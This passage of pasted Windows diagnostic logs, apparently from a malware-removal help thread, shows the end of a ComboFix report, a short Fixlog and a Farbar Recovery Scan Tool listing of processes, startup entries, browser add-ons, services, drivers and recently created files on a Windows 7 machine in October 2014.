"ImagePath"="c:\program files\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (Read) (RestrictedCode)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_15_0_0_167_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_15_0_0_167_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-10-28  09:58:56
ComboFix-quarantined-files.txt  2014-10-28 13:58
ComboFix2.txt  2014-10-28 13:36
.
Pre-Run: 108,518,948,864 bytes free
Post-Run: 108,367,802,368 bytes free
.
- - End Of File - - 89F220DE54E26226DF60D1E6661C02AC
A36C5E4F47E84449FF07ED3517B43A31
 
========= End of CMD: =========
 
C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4} => Moved successfully.
C:\ProgramData\Windows Genuine Advantage => Moved successfully.
 
 
The system needed a reboot. 
 
==== End of Fixlog ====
 
 
FRST.TXT
 
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 30-10-2014
Ran by KELI (administrator) on ATTY-2 on 30-10-2014 09:18:27
Running from C:\Users\KELI\Desktop
Loaded Profile: KELI (Available profiles: KELI)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(McAfee, Inc.) C:\Program Files\McAfee\Managed VirusScan\VScan\EngineServer.exe
(InterVideo) C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
(Intel Corporation) C:\Program Files\Intel\AMT\LMS.exe
(PDF Complete Inc) C:\Program Files\PDF Complete\pdfsvc.exe
(Protexis Inc.) C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
(Microsoft Corporation) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
() C:\Program Files\SiteAdvisor\6173\SAService.exe
(Intel Corporation) C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Windows\System32\PrintIsolationHost.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Intel Corporation) C:\Program Files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe
(McAfee, Inc.) C:\Program Files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.exe
() C:\Program Files\SiteAdvisor\6173\SiteAdv.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Adobe Systems Incorporated) C:\Program Files\Adobe\Reader 10.0\Reader\reader_sl.exe
(KYOCERA MITA Corporation) C:\Program Files\Kyocera\FileUtility\NsCatCom.exe
(Dropbox, Inc.) C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [7596576 2009-07-02] (Realtek Semiconductor)
HKLM\...\Run: [picon] => C:\Program Files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe [796696 2009-07-24] (Intel Corporation)
HKLM\...\Run: [PDF Complete] => C:\Program Files\PDF Complete\pdfsty.exe [563736 2009-06-18] (PDF Complete Inc)
HKLM\...\Run: [Microsoft Default Manager] => C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [439568 2010-05-10] (Microsoft Corporation)
HKLM\...\Run: [MVS Splash] => C:\Program Files\McAfee\Managed VirusScan\Agent\Splash.exe [562496 2009-11-17] (McAfee, Inc.)
HKLM\...\Run: [McAfee Managed Services Tray] => C:\Program Files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.Exe [95552 2009-11-17] (McAfee, Inc.)
HKLM\...\Run: [SiteAdvisor] => C:\Program Files\SiteAdvisor\6173\SiteAdv.exe [36640 2007-08-28] ()
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\RunOnce: [NCPluginUpdater] => C:\Program Files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe [21720 2014-10-21] (Hewlett-Packard)
HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-03-21] (Google Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Scanner File Utility.lnk
ShortcutTarget: Scanner File Utility.lnk -> C:\Program Files\Kyocera\FileUtility\NsCatCom.exe (KYOCERA MITA Corporation)
Startup: C:\Users\KELI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPCOM/1
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
BHO: No Name -> {089FD14D-132B-48FC-8861-0048AE113215} -> C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Bing Bar BHO -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - @C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll,-100 - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
Toolbar: HKLM - McAfee SiteAdvisor - {0BF43445-2F28-4351-9252-17FE6E806AA0} - C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: myrm - {4D034FC3-013F-4b95-B544-44D49ABE3E76} - C:\Program Files\McAfee\Managed VirusScan\Agent\myRmProt4.9.2.358.dll (McAfee, Inc.)
Handler: siteadvisor - {3A5DC592-7723-4EAA-9EE6-AF4222BCF879} - C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
Tcpip\..\Interfaces\{47CED9F3-6727-4E66-BBD7-559438BB948D}: [NameServer] 167.206.245.130,167.206.245.129
 
FireFox:
========
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @Microsoft.com/NpWinExt,version=5.0 -> C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\KELI\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM\...\Firefox\Extensions: [msntoolbar@msn.com] - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\Firefox
FF Extension: Bing Bar - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\Firefox [2010-10-16]
FF HKLM\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2010-10-16]
FF HKLM\...\Firefox\Extensions: [{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}] - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension
FF Extension: Default Manager - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension [2010-10-16]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\38.0.2125.111\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\38.0.2125.111\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\38.0.2125.111\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll No File
CHR Plugin: (Bing Bar) - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
CHR Profile: C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-18]
CHR Extension: (Google Wallet) - C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-04-01]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 EngineServer; C:\Program Files\McAfee\Managed VirusScan\VScan\EngineServer.exe [14144 2009-06-02] (McAfee, Inc.)
S2 HP Support Assistant Service; C:\Program Files\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
S4 McShield; C:\Program Files\McAfee\Managed VirusScan\VScan\McShield.exe [144704 2009-06-02] (McAfee, Inc.)
S4 myAgtSvc; C:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe [221024 2009-11-17] (McAfee, Inc.)
R2 pdfcDispatcher; C:\Program Files\PDF Complete\pdfsvc.exe [635416 2009-06-18] (PDF Complete Inc)
R2 SiteAdvisor Service; C:\Program Files\SiteAdvisor\6173\SAService.exe [341280 2010-10-16] ()
R2 UNS; C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2066968 2009-07-24] (Intel Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-10-27] (Malwarebytes Corporation)
S3 MfeAVFK; C:\Windows\System32\drivers\MfeAVFK.sys [79816 2009-05-15] (McAfee, Inc.)
S3 MfeBOPK; C:\Windows\System32\drivers\MfeBOPK.sys [35272 2009-05-15] (McAfee, Inc.)
R1 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [214024 2009-05-15] (McAfee, Inc.)
S3 MfeRKDK; C:\Windows\System32\drivers\MfeRKDK.sys [34248 2009-05-15] (McAfee, Inc.)
R1 mfetdik; C:\Windows\System32\drivers\mfetdik.sys [55336 2009-05-15] (McAfee, Inc.)
R3 vpcbus; C:\Windows\System32\DRIVERS\vpchbus.sys [172416 2010-11-20] (Microsoft Corporation)
R1 vpcnfltr; C:\Windows\System32\DRIVERS\vpcnfltr.sys [48128 2010-11-20] (Microsoft Corporation)
R3 vpcusb; C:\Windows\System32\DRIVERS\vpcusb.sys [78336 2010-11-20] (Microsoft Corporation)
R1 vpcvmm; C:\Windows\System32\drivers\vpcvmm.sys [296064 2010-11-20] (Microsoft Corporation)
S3 catchme; \??\C:\Users\KELI\AppData\Local\Temp\catchme.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-30 09:18 - 2014-10-30 09:18 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller (2).exe
2014-10-30 09:18 - 2014-10-30 09:18 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Desktop\tdsskiller (2).exe
2014-10-30 09:15 - 2014-10-30 09:15 - 00000000 ____D () C:\Users\KELI\Desktop\FRST-OlderVersion
2014-10-30 09:14 - 2014-10-30 09:14 - 00000619 _____ () C:\Users\KELI\Documents\fixlist.txt
2014-10-28 09:58 - 2014-10-28 09:58 - 00047174 _____ () C:\ComboFix.txt
2014-10-28 09:48 - 2014-10-28 09:58 - 00000000 ____D () C:\Qoobox
2014-10-28 09:48 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-10-28 09:48 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-10-28 09:48 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-10-28 09:46 - 2014-10-28 09:48 - 01998336 _____ () C:\Users\KELI\Downloads\AdwCleaner.exe
2014-10-28 09:45 - 2014-10-28 09:44 - 05591695 ____R (Swearware) C:\Users\KELI\Desktop\ComboFix.exe
2014-10-28 09:43 - 2014-10-28 09:44 - 05591695 _____ (Swearware) C:\Users\KELI\Downloads\ComboFix.exe
2014-10-28 09:24 - 2014-10-28 09:24 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller (1).exe
2014-10-28 09:23 - 2014-10-28 09:24 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller.exe
2014-10-27 17:24 - 2014-10-27 17:24 - 00003189 _____ () C:\Users\KELI\Desktop\Sophos Virus Removal Tool.lnk
2014-10-27 17:24 - 2014-10-27 17:24 - 00000000 ____D () C:\Users\KELI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sophos
2014-10-27 17:24 - 2014-10-27 17:24 - 00000000 ____D () C:\ProgramData\Sophos
2014-10-27 17:24 - 2014-10-27 17:24 - 00000000 ____D () C:\Program Files\Sophos
2014-10-27 17:18 - 2014-10-27 17:19 - 00000000 ____D () C:\NPE
2014-10-27 16:54 - 2014-10-27 17:21 - 00000000 ____D () C:\Users\KELI\AppData\Local\NPE
2014-10-27 16:54 - 2014-10-27 16:54 - 00000000 ____D () C:\ProgramData\Norton
2014-10-27 16:53 - 2014-10-27 16:56 - 103020744 _____ (Sophos Limited) C:\Users\KELI\Downloads\Sophos Virus Removal Tool.exe
2014-10-27 16:52 - 2014-10-27 16:53 - 03060320 ____N (Symantec Corporation) C:\Users\KELI\Downloads\NPE.exe
2014-10-27 16:16 - 2014-10-28 09:45 - 00000000 ____D () C:\Windows\erdnt
2014-10-27 16:12 - 2014-10-28 10:02 - 00023989 _____ () C:\Users\KELI\Desktop\Addition.txt
2014-10-27 16:11 - 2014-10-30 09:18 - 00012652 _____ () C:\Users\KELI\Desktop\FRST.txt
2014-10-27 16:11 - 2014-10-30 09:18 - 00000000 ____D () C:\FRST
2014-10-27 16:10 - 2014-10-27 16:10 - 01706144 _____ (Thisisu) C:\Users\KELI\Downloads\JRT.exe
2014-10-27 16:10 - 2014-10-27 16:10 - 01706144 _____ (Thisisu) C:\Users\KELI\Downloads\JRT (1).exe
2014-10-27 16:07 - 2014-10-30 09:15 - 01105408 _____ (Farbar) C:\Users\KELI\Desktop\FRST.exe
2014-10-27 16:07 - 2014-10-27 16:07 - 01104896 _____ (Farbar) C:\Users\KELI\Downloads\FRST.exe
2014-10-27 15:28 - 2014-10-27 16:41 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-27 15:28 - 2014-10-27 15:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-27 15:28 - 2014-10-27 15:29 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-27 15:28 - 2014-10-27 15:28 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-27 15:28 - 2014-10-01 11:11 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-27 15:28 - 2014-10-01 11:11 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-27 15:28 - 2014-10-01 11:11 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-15 13:57 - 2014-10-09 21:44 - 00396288 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 13:57 - 2014-10-09 21:44 - 00230912 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 13:57 - 2014-10-09 21:39 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 13:57 - 2014-10-06 22:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-15 13:57 - 2014-09-28 20:41 - 02379264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-15 13:57 - 2014-09-25 18:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-15 13:57 - 2014-09-25 18:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-15 13:57 - 2014-09-25 18:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-15 13:57 - 2014-09-25 18:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-15 13:57 - 2014-09-25 18:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-15 13:57 - 2014-09-18 21:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-15 13:57 - 2014-09-18 21:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-15 13:57 - 2014-09-18 21:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-15 13:57 - 2014-09-18 21:14 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-15 13:57 - 2014-09-18 21:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-15 13:57 - 2014-09-18 21:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-15 13:57 - 2014-09-18 21:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-15 13:57 - 2014-09-18 20:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-15 13:57 - 2014-09-18 20:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-15 13:57 - 2014-09-18 20:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-15 13:57 - 2014-09-18 20:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-15 13:57 - 2014-09-18 20:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-15 13:57 - 2014-09-18 20:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-15 13:57 - 2014-09-18 20:50 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-15 13:57 - 2014-09-18 20:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-15 13:57 - 2014-09-18 20:44 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-15 13:57 - 2014-09-18 20:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 13:57 - 2014-09-18 20:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-15 13:57 - 2014-09-18 20:20 - 00677888 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-15 13:57 - 2014-09-18 20:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-15 13:57 - 2014-09-18 20:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-15 13:57 - 2014-09-18 19:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-15 13:57 - 2014-09-18 19:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-15 13:57 - 2014-09-18 19:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-15 13:57 - 2014-09-04 01:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 13:57 - 2014-06-18 18:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-15 13:57 - 2014-06-18 18:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-15 13:57 - 2014-06-18 18:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-15 13:56 - 2014-09-17 21:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 13:56 - 2014-09-12 21:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 13:56 - 2014-08-18 22:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-15 13:56 - 2014-08-18 22:41 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-15 13:56 - 2014-08-18 22:41 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-15 13:56 - 2014-08-18 22:40 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-15 13:56 - 2014-08-18 22:40 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-15 13:56 - 2014-08-18 21:48 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-15 13:56 - 2014-07-16 21:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 13:56 - 2014-07-16 21:39 - 00523264 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00304128 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 13:56 - 2014-07-16 21:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 13:56 - 2014-07-16 21:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 13:56 - 2014-07-16 21:03 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 13:56 - 2014-07-16 21:02 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-15 13:56 - 2014-07-06 21:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
